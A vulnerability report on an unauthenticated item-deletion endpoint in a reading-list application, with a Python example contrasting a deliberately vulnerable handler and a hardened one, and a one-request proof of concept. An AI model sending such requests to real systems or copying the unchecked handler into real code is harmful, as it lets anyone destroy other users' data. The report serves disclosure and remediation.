Unauthenticated reading list item deletion
# Description
An unauthenticated user can delete any book item from any user's reading list in the system, without any authentication or authorization check, via the `/api/readinglist/delete-item` API endpoint.
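The missing check is the authorization step: the handler must know who is calling and confirm that the reading list belongs to that caller before deleting anything. The following is an added example, not the project's own code: a framework-free handler over an in-memory store that shows the reported behaviour beside a hardened version. The store layout, the function names, the user ids and the error mapping are assumptions made for the illustration.

```python
"""Added example (not the application's code): an unauthenticated delete
beside a hardened handler that authenticates the caller and checks that the
reading list belongs to them. Store layout, names and ids are assumed."""
import json
from dataclasses import dataclass


class NotFound(Exception):
    """Raised for a missing list/item or a list the caller does not own."""


@dataclass
class ReadingList:
    owner_id: int
    items: dict  # item_id -> title


def make_store():
    # Constructed sample data: two users (10 and 20), one reading list each.
    return {
        1: ReadingList(owner_id=10, items={100: "Book A", 101: "Book B"}),
        2: ReadingList(owner_id=20, items={200: "Book C"}),
    }


def delete_item_vulnerable(store, reading_list_id, item_id):
    """Mirrors the reported flaw: the caller's identity is never consulted,
    so any client that knows two ids can delete any user's item."""
    store[reading_list_id].items.pop(item_id)
    return True


def delete_item_hardened(store, current_user_id, reading_list_id, item_id):
    """Deletes only when the list exists and belongs to current_user_id."""
    reading_list = store.get(reading_list_id)
    # Ownership check. "Not yours" is reported exactly like "does not exist",
    # so the endpoint cannot be used to enumerate other users' list ids.
    if reading_list is None or reading_list.owner_id != current_user_id:
        raise NotFound()
    if item_id not in reading_list.items:
        raise NotFound()
    del reading_list.items[item_id]
    return True


def handle_delete_item(store, session_user_id, raw_body):
    """Request handler returning (status_code, payload).

    session_user_id is the user id the server has already verified from the
    session; None means the request carried no valid credentials.
    """
    # Authentication: reject anonymous callers before touching the body.
    if session_user_id is None:
        return 401, {"error": "authentication required"}
    # Input validation: both ids must be present and integral.
    try:
        body = json.loads(raw_body)
        reading_list_id = int(body["readingListId"])
        item_id = int(body["readingListItemId"])
    except (ValueError, KeyError, TypeError):
        return 400, {"error": "readingListId and readingListItemId must be integers"}
    # Authorization happens inside delete_item_hardened.
    try:
        delete_item_hardened(store, session_user_id, reading_list_id, item_id)
    except NotFound:
        return 404, {"error": "not found"}
    return 200, {"deleted": item_id}


if __name__ == "__main__":
    store = make_store()
    print(handle_delete_item(store, None, '{"readingListId":1,"readingListItemId":100}'))
    print(handle_delete_item(store, 20, '{"readingListId":1,"readingListItemId":100}'))
    print(handle_delete_item(store, 10, '{"readingListId":1,"readingListItemId":100}'))
```

The ordering matters: authenticate first, validate the body second, and authorize against the loaded record last, so an anonymous or malformed request never reaches the data layer. Returning 404 for both "missing" and "not owned" keeps the endpoint from confirming which list ids exist.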
# Proof of Concept
1 – Send the following request, where `x` is the target readingListId and `y` is the id of the item in that list:
```
POST http://localhost:5000/api/readinglist/delete-item HTTP/1.1
Content-Type: application/json

{"readingListId": x, "readingListItemId": y}
```